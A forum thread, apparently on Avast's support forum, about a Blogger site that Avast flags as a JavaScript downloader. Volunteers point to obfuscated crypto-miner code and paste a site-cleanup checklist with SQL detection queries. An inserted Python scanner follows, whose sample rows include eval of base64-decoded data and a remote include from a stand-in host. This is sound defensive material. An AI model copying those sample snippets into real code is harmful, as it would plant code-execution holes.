Avast Says that My website is infected

Hello,
I have a blog post at wxw.egyptsonline.com and I’ve got Avast alert saying that it aborted connection on wxw.egyptsonline.com because it was infected with JS:Downloader-FJP [Trj].

I’ve Checked my blog many times but it’s okay.

Please help.

Thanks in advance

You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php

HTML scan
https://www.virustotal.com/gui/file/01ec324eafe441ee12ac0ef54d96e79e5df5963983316d0949f1c35c999056b7/detection

Wait for a final verdict from an avast team member, as we here are just volunteers with relevant knowledge,
but cannot come and unblock, only avast team members can.

Probably script from line 1751-1765, heavily obfuscated javascript code, is being flagged here.
See: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LntneXB0c11ubFtuey5eXW1g~enc , which is found to be a crypto-miner script

Not flagged: https://zulu.zscaler.com/submission/3f0b3168-89ee-44c9-8a4f-d9e1c246ec3f

Quttera flags the website as suspicious, but the original scan was clean.
Detected crypto miner - 23 suspicious files → https://quttera.com/detailed_report/www.egyptsonline.com
Exactly the obfuscated code I mentioned earlier from line 1751-1765
Detected is encoded JavaScript code, commonly used to hide suspicious behaviour,
crypto-miner…

Cleanse that miner script off of your website,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

Hello,

Thank you very much for your response.
I tried to remove many things but I still get the same alert, and avast also prevents me from accessing your forum.

Note: I bought my website template as it is without any changes, I don't know why that happens now.

Best regards

You don’t say why avast alerts on your site (a screenshot of the alert might help)?

It might also have something to do with your Web Host and why more information is required.

If you haven’t done so already the direct form of contact (reporting this) is the link in Reply #1, then you need to do that.

Hello,

Thank you very much for your response.

Actually, my blog is on Google, and I have contacted them, they said that:

Here is the text:

Hi
Can you check with Avast to see why they report that?
https://sitecheck.sucuri.net/results/https/www.egyptsonline.com shows no issue and Chrome /Google do not block it.

EDIT
And you did clear the cache etc?

And you are using the https www version of the url?

About the link in Reply #1

I've submitted a request 2 times without any results

I attached a screenshot of the alert

VirusTotal does not flag that actual site, but has various detections for that particular IP.

Anyway as I said, wait for a final verdict from an avast team member,
they may come up after the week-end with an answer.

polonus

@ romanynazmy4
Your attached image would suggest that you have a javascript element somewhere on the site.

Response from that link wouldn’t be immediate and you may not get a direct response, but that link is monitored by the virus labs team. There may be a delay given it is a weekend.

As mentioned, we would have to wait for input from avast.

Well the 7 detections that VT produces here: https://www.virustotal.com/gui/file/01ec324eafe441ee12ac0ef54d96e79e5df5963983316d0949f1c35c999056b7/detection
(thanks, Pondus, for posting these results earlier) are still actual, and haven’t changed.

AegisLab detects Trojan.HTML.Generic.4!c
Antiy-AVL detects Trojan[Clicker]/JS.Pvgtr.dldr
Avast detects JS:Downloader-GNM [Trj]
AVG detects JS:Downloader-GNM [Trj]
Ikarus detects Trojan.JS
Qihoo-360 detects Script/Trojan.Downloader.8ea
Zoner detects Trojan.HTML.Adobe.78454
As I see it not much room for a false positive then or 7 av solutions are wrong.

A more recent html scan now has 5 detecting it: https://www.virustotal.com/gui/file/5e2afaa6f1c75210c9dc1652ce3690ab642a5b7ecdc4f7db9d2028749ba725f8/detection

This malware has been with us since 2003 and since has seen new variants appear:

As soon as Trojan.Downloader.JS.Agent enters your computer system, it creates a file named %System%.exe, %temp%wininet.dll and then it starts to make changes to Windows Register, by changes and additions to the register.

So what is the nature of the obfuscated JavaScript code here?

Related malcode:

XMRig Miner Trojan
LokiBot Trojan
CoinHive Miner Trojan
Trojan.Generic

polonus

Hello Pondus

Thank you for your response.

Actually, I bought the template as it is, about 2 years ago without any changes.
Why does that happen now?

Note: I contacted the technical support (forum) of Blogger, they said that the problem is with you.

Please, tell me the way to solve the issue…
Tell me the steps, I am not a programmer…
Thanks again

Let someone do that cleansing for you. Read about it here for a likewise malware infection:

https://forum.vbulletin.com/forum/vbulletin-3-8/vbulletin-3-8-questions-problems-and-troubleshooting/414123-how-to-get-rid-of-this-malware

To check a site for compromises follow these steps: (likewise routine, here meant for vbulletin)
  1. Run Suspect File Diagnostics under Maintenance → Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can’t identify as belonging to your addons.

  2. Check the config.php for any suspicious code. It isn’t checked by the suspect file diagnostic.

  3. Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

  4. Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

  5. Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some “lite” or branded addons will include this as a means to prevent you from cheating the author. You’ll have to make a personal call on these if you use them. This is often a sign of a hacked site.

  6. Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

The following query can be run in phpMyAdmin and will provide results for steps 5 and 6:
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%pass_thru%' OR phpcode LIKE '%iframe%';

If you have a plugin that you can’t read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

  7. Using phpMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%pass_thru%' OR template LIKE '%iframe%';

It checks the templates for compromising code. You will need to review the results from this. If you can’t read it or the code is obfuscated then you should revert the template in the Admin CP.

  8. Check .htaccess to make sure there are no redirects there.

  9. Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.

Info credits go to vbulletin support’s Trevor Hannant.

polonus
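One way to automate steps 3 to 7 of the checklist above outside phpMyAdmin, as an added Python example that is not part of this thread or of vBulletin's own tooling; the row format ('title' and 'code' keys) and the sample plugin/template contents are constructed assumptions, and the remote include check goes slightly beyond the page by flagging include/require of a URL:

```python
import re

# Templates where an iframe tag is expected (the allow-list from step 3 above).
ALLOWED_IFRAME_TEMPLATES = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
    "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
    "search_common", "search_common_select_type",
}

# The indicators from steps 3-7 and the two phpMyAdmin queries, case-insensitive.
# 'remote_include' is an assumption added here: include/require of an http(s) URL.
PATTERNS = {
    "base64": re.compile(r"base64", re.I),
    "exec": re.compile(r"\bexec\s*\(", re.I),
    "system": re.compile(r"\bsystem\s*\(", re.I),
    "pass_thru": re.compile(r"\bpass_?thru\s*\(", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "remote_include": re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I),
}

def scan_rows(rows, allowed_iframe=ALLOWED_IFRAME_TEMPLATES):
    """Return findings as (title, pattern, line_no, snippet) tuples.

    rows: iterable of dicts with 'title' and 'code' keys, e.g. exported from the
    plugin or template table. An iframe inside an allow-listed template is not
    reported, mirroring step 3; everything else that matches is listed for review.
    """
    findings = []
    for row in rows:
        for line_no, line in enumerate(row["code"].splitlines(), start=1):
            for name, pat in PATTERNS.items():
                if not pat.search(line):
                    continue
                if name == "iframe" and row["title"] in allowed_iframe:
                    continue
                findings.append((row["title"], name, line_no, line.strip()[:80]))
    return findings

# Constructed sample rows (not from the thread); some are deliberately suspicious.
SAMPLE_ROWS = [
    {"title": "bbcode_video", "code": '<iframe src="https://www.youtube.com/embed/{vid}"></iframe>'},
    {"title": "footer", "code": '<div class="footer">\n<iframe src="//example.invalid/x" width="0"></iframe>\n</div>'},
    {"title": "stats_hook", "code": '$out = base64_decode($blob);\neval($out);'},
    {"title": "backup_hook", "code": 'system("tar czf /tmp/backup.tgz ./");'},
    {"title": "theme_loader", "code": 'require_once("https://example.invalid/theme.php");'},
    {"title": "header", "code": '<script src="/js/site.js"></script>'},
]

if __name__ == "__main__":
    for title, name, line_no, snippet in scan_rows(SAMPLE_ROWS):
        print(f"{title}: {name} at line {line_no}: {snippet}")
```

Every hit still needs a human read, as step 5 notes for legitimate base64 in branded addons; the script only narrows what to look at.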

Hello Pondus,

Thanks for your answer.

I don't have these tools, I have a blog post on Google.

Please, tell me why that happens now though I bought the template 2 years ago without any changes?

Thank you very much for your efforts.

Hello Pondus,
Hello ..... note that P o n d u s and P o l o n u s is not the same guy ;)

Quttera says it detects a crypto miner https://quttera.com/detailed_report/egyptsonline.com

Hi romanynazmy4,

For support go here: https://support.google.com/blogger/community

For security implications it is also good to see this following scan report:

https://webcookies.org/cookies/www.egyptsonline.com/27979411?801691

Main issue mentioned there: “The page loads 11 third-party JavaScript files and 11 CSS but does not employ Sub-Resource Integrity to prevent breach if a third-party CDN is compromised”.

Suspicious pattern detected twice. Also confirmed with the Quttera scan result.

No Pondus and polonus are different persons, but Pondus has been found many times to cooperate closely with polonus.

polonus is a third party cold reconnaissance scanner here in the Virus & Worms
while Pondus has a very fundamental knowledge of VirusTotal scan lore, which is often very helpful.

greetings from the surroundings of Rotterdam, Holland,

polonus